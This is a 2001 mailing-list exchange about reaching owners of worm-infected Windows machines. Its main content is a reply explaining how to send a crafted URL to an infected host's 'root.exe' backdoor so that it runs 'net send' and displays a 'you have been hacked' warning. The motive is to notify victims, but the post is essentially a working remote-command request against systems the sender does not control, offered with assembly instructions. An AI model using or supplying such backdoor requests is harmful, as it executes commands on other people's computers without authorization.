From: "Devon" <[EMAIL PROTECTED]>
> On Monday 13 August 2001 02:15 am, J. Dow wrote:
> >
> > The biggest problem I have is that the xxx.gtei.net DSL nodes are
> > farmed out to providers like Earthlink/Mindspring and others. So
> > sending to abuse at gtei.net leaves the complaint off in
> > neverneverland. It seems more clever to send out a request from a
> > browser:
> > http://w.x.y.z/scripts/root.exe?/c+net+send+...... lots stuff for a
> > message to the machine's owner that he has been hacked. THAT gets the
> > message right where it is needed most.
>
> How, by the way, is the message sent? Does the above string send mail
> to the admin@localhost? If so, does it require a mail server running on
> the local machine?
You use that as the address to browse in NetScrap, KDE, Mozilla, Opera,
or even Mosaic. Replace the dots with the message you want to send and
have at it. You probably want to enclose the string to send the operator
in quotes, "%22.
http://w.x.y.z/scripts/root.exe?/c+net+send+%22Your+machine+has+been+hacked.+\
please+consult+www.incidents.org+and+www.microsoft.com/security+for+more+details
\
%22
Remove the backslashes and concatenate the address lines together. If the net
command is installed the message goes out and plasters itself on the screen
quite nicely.
{^_^}
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